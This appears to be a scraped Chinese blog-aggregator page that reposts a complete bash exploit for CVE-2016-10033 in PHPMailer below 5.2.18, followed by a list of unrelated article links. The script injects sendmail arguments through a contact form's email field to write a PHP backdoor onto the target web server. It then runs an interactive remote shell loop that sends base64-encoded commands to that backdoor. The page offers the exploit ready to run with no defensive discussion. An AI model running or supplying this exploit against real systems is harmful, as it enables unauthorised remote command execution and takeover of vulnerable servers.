PHPMailer < 5.2.18
来源:互联网 发布:python量化策略回测 编辑:程序博客网 时间:2024/06/10 19:05
#!/bin/bash
# CVE-2016-10033 exploit by opsxcq
# https:
//github.com/opsxcq/exploit-CVE-2016-10033
echo
'[+] CVE-2016-10033 exploit by opsxcq'
if
[ -z
"$1"
]
then
echo
'[-] Please inform an host as parameter'
exit
-1
fi
host=
$1
echo
'[+] Exploiting '
$host
curl -sq
'http://'
$host
-H
'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe'
--data-binary $
'------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="name"\r\n\r\n<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\nvulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n'
>/dev/null &&
echo
'[+] Target exploited, acessing shell at http://'
$host
'/backdoor.php'
cmd=
'whoami'
while
[
"$cmd"
!=
'exit'
]
do
echo
'[+] Running '
$cmd
curl -sq http:
//$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | head -n 1 | cut -d '|' -f 2 | base64 -d
echo
read -p
'RemoteShell> '
cmd
done
echo
'[+] Exiting'
0 0
- PHPMailer < 5.2.18
- PHPMailer
- PHPMailer
- phpmailer
- phpmailer
- PHPMailer / PHPMailer
- phpmailer-1.73
- phpmailer 实例
- PHPMailer Sample
- phpMailer 使用
- phpmailer使用
- phpmailer使用说明
- phpmailer使用方法
- phpmailer配置
- PHPMailer使用说明
- PHPMailer使用
- PHPMailer使用
- Laravel5 +phpmailer
- Google最新XSS Game Writeup
- webstorm 2017 激活破解
- 判断单链表是否存在环及求环入口点
- Unity3d Camera的Clear Flags、Culling Mask和Depth三个属性的理解
- servlet错误①
- PHPMailer < 5.2.18
- mybatis mysql 批量insert 返回主键
- Android5.1 电池充电剩余时间计算
- hive原理与源码分析-hive源码架构与理论(一)
- 深度学习 发展 优缺点 面试
- Spark应用提交指南(spark-submit)
- android 常见死机问题--log分析
- PAT 乙级 1032. 挖掘机技术哪家强(20)
- Laravel 5.4 如何定义API Routes